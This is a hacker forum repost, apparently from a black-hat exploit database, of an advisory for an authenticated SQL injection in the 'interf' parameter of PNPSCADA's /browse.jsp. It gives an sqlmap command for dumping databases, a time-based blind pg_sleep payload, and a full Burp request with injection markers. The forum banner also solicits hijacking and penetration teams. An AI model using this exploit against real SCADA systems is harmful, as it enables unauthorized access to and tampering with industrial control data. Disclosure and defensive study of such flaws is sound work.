跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
# Google Dork: -
# Date: 2020-08-17
# Exploit Author: İsmail ERKEK
# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
# Version: 2.200816204020
# Tested on: -


1. Description:
----------------------

PNPSCADA  2.200816204020 allows SQL Injection via parameter 'interf' in
/browse.jsp. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.

2. Proof of Concept:
----------------------

In Burpsuite intercept the request from one of the affected pages with
'interf' parameter and save it like fuel.req Then run SQLmap to extract the
data from the database:

sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent

3. Example payload:
----------------------

(time-based blind)

memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831

4. Burpsuite request:
----------------------

POST /browse.jsp HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer:
http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37

memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831



Best Regards.
Ek alanı

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。